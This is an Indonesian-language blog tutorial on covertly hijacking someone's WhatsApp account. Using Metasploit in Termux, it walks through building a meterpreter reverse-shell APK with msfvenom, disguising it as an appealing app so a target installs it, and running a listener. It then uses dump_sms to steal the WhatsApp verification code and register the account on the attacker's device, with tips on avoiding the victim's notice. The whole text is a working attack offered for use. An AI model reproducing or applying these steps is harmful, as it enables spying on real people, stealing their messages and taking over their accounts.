Tutorial sadap wa berikut ini dapat anda jalankan hanya dengan aplikasi termux. Singkatnya, anda harus memasang tools metasploit di termux dan melakukan proses penyadapan.
Cara kerja nya, kita akan menjalankan metasploit dari aplikasi termux untuk membuat apk hack wa. Aplikasi tersebut harus dikirim ke target barulah kita bisa dengan bebas menyadap whatsapp korban. Teknik seperti ini disebut juga dengan backdoor.
Mungkin diantara kalian sudah pernah mendengan istilah backdoor/playload. Tidak hanya untuk sadap wa, playload ini juga dapat digunakan untuk mengontrol android dari jarak jauh.
Tapi karena sekarang kita sedang belajar menyadap wa menggunakan termux, jadi saya hanya akan membahas bagian yang terkait saja. Berikut penjelasan lengkapnya.
Cara Sadap Whatsapp Termux Menggunakan Metasploit
Cara sadap wa ini berbeda dengan whatsapp web yang akan muncul notif di hp korban seperti gambar dibawah ini.
Tapi dihp korban tidak akan muncul notif apapun. Jadi tidak akan ketahuan bahwa kita lah pelaku pembajakan tersebut.
Pertama kita harus menginstal tools metasploit diaplikasi termux. Masukan saja perintah:
pkg install metasploit
Apabila gagal, silahkan ikuti panduan lengkap cara install metasploit di termux.
Selanjutnya kita akan membuat aplikasi untuk hack whatsapp atau biasa disebut dengan backdoor dari metasploit. Aplikasi ini yang akan menjadi perantara antara hp korban dengan tools metasploit yang sedang dijalankan.
Saat backdoor sudah terhubung, kita tinggal memasukan perintah dari metasploit untuk mendapatkan chat whatsapp korban.
Bagaimana, ingin mencoba?
Berikut cara sadap wa termux via backdoor metasploit
1. Jalankan tool metasploit
Pastikan kalian sudah menginstal metasploit dengan benar.
Apabila sudah, ketik perintah berikut di tampilan awal aplikasi termux:
msfconsole
Tunggu loading sampai metasploit bisa dilaunch.
Tanda apabila kita sudah masuk ke tools ini, lihat saja gambar dibawah ini:
Biasanya diatas kode metasploit terdapat logo (ASCII) yang berubah-ubah. Kadang sapi, tengkorak, tank baja, dll. Jadi kalau kalian menjalankan metasploit kemudian mendapati logo yang berbeda, jangan dipermasalahkan.
2. Buat aplikasi hack whatsapp
Nama aplikasi nya bisa kalian atur sendiri. Tapi disini saya contohkan dengan nama backdoor.apk (agar mudah menjelaskannya).
Pada tampilan awal metasploit, masukan perintah berikut:
msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /sdcard/backdoor.apk
Keterangan :
– Ganti LHOST dengan alamat IP kalian
– Backdoor.apk adalah nama aplikasi, silahkan ganti dengan nama pilihan kalian. (harus diakhiri dengan .apk)
Diatas adalah 1 baris perintah, itu artinya jangan menekan enter sebelum kata terakhir ( /sdcard/namaAplikasi.apk )
Rekomendasi dari saya, ganti nama aplikasi ini menjadi nama yang membuat orang lain ingin menginstalnya. Contohnya seperti s*m*ntok.apk (shoope pink), hack pulsa.apk, dll.
Mengapa harus diubah?
Tujuannya adalah agar target mau menginstall aplikasi backdoor tersebut. Karena jika sudah diinstall kita baru bisa melakukan proses selanjutnya.
Apabila proses pembuatan aplikasi berhasil, maka akan muncul dilayar termux notif seperti ini:
saved as: /sdcard/backdoor.apk
Silahkan cek di penyimpanan internal android, pastikan ada file yang bernama backdoor.apk (atau nama yang kalian tulis sebelumnya).
Jika proses pembuatan apk gagal, coba periksa dulu perizin aplikasi termux di pengaturan hp. Pastikan ada izin untuk mengakses penyimpanan. Kemudian ulangi lagi proses pembuatan seperti diatas.
3. Hubungkan aplikasi yang baru dibuat dengan metasploit
Agar aplikasi bisa dihubungkan, syarat utamanya adalah aplikasi tersebut harus diinstall di android target sadap wa.
Jadi silahkan kirimkan file .apk nya ke orang yang ingin kalian sadap atau instal di hp sendiri dulu juga tidak apa untuk percobaan.
Kemudian kembali lagi ke tools metasploit dan masukan perintah berikut:
. use multi/handler . set payload android/meterpreter/reverse_tcp . set lhost ip kalian . set lport 4444 . exploit
Diatas adalah 5 baris perintah. Tekan enter setiap selesai menuliskan 1 baris perintah.
Tunggu proses menghubungkan antara aplikasi dengan metasploit. Apabila sudah terhubung akan muncul “meterpreter >” seperti gambar dibawah ini:
Catatan:
Kadang proses menghubungkan ini bisa gagal. Solusinya adalah saat aplikasi sudah terinstal di hp target, cepatlah masukan perintah use multi/handler diatas.
Pastikan juga koneksi internet yang digunakan tidak bermasalah.
Berdasarkan pengalaman saya, apabila backdoor diinstal di hape sendiri proses meterpreter tidak akan menjadi masalah. Tapi pada saat dipraktekan dilain hape terkadang harus membutuhkan ngrok server.
4. Mendaftar akun whatsapp menggunakan nomer target
Ingat!! Pastikan proses menghubungkan apk berhasil (ada meterpreter di layar termux).
Selanjutnya silahkan kalian membuat akun whatsapp lagi dengan nomer hp target.
Loh .. untuk apa ?
Saat apk hack wa sudah terhubung, maka semua notifikasi di hp target bisa kita ketahui. Nah, dengan mendaftar wa menggunakan nomer target, otomatis kita membutuhkan kode verifikasi whatsapp yang dikirimkan ke nomer dia.
Kode verifikasi whatsapp bisa diketahui di langkah no 5, untuk sekarang silahkan kalian selesaikan dulu pendaftaran akun whatsapp sampai proses memasukan kode verifikasi.
Sebaiknya lakukan trik ini dimalam hari atau pada saat target sedang tidak mengakses hp. Alasanya dia bisa curiga apabila ada sms masuk yang berisi kode verifikasi whatsapp.
5. Mengambil kode verifikasi whatsapp dari dump SMS
Silahkan kembali lagi ke aplikasi termux yang sedang menampilkan meterpreter.
Kemudian masukan kode berikut untuk mendapatkan kode verifikasi whatsapp korban:
dump_sms
Selanjutnya akan muncul nama file berakhiran .txt
Kalian copy saja nama filenya lalu pergi ke new season termux.
Cara nya usap layar dari kiri ke kanan dan pilih new season.
Selanjutnya masukkan perintah berikut ini:
nano namafile.txt contoh : nano sms_dump_121374564848.txt
Apabila tidak bisa, coba masukan dulu perintah pkg install nano -y untuk menginstal nano editor.
Nah, saat file .txt terbuka, kalian akan mendapatkan semua pesan dari hp korban. Cari saja sms yang berisi kode verifikasi dari whatsaapp.
Setelah ketemu, copy kode verifikasi nya dan masukan di pendaftaran whatsapp kalian yang terhenti sebelumnya.
Dan taraaaa… kalian sudah berhasil menghack akun whatsapp target.
Mungkin diantara kalian masih ada yang kesulitan atau bahkan bingung. Untuk membantu pemahaman, sudah saya sertakan tutorial dalam bentuk video berikut ini.
Bagi pemula yang belum begitu bisa menggunakan termux mungkin akan kesulitan. Saran saya, silahkan gabung ke grup cyber newbi (dipojok kanan bawah) agar bisa mendapatkan solusi untuk masalah yang sedang terjadi.
Atau kalian juga bisa langsung menanyakannya langsung melalui kolom komentar dibawah.
Pengamalan saya sendiri, butuh waktu 2 hari untuk mempraktekan cara sadap whatsapp termux sampai berhasil. Saya ulang terus video dan baca lagi artikel sumber (termux.id) sampai akhirnya saya paham.
Dan masalah yang sering muncul adalah pada saat menghubungkan backdoor dengan hp kita. Pada proses meterpreter terkadang konek dan putus, sehingga harus mengulangnya dari awal.
Oke sampai disini dulu pembahasa kita kali ini, semoga bisa bermanfaat. Terimakasih sudah membaca dan jangan lupa share ya kawan.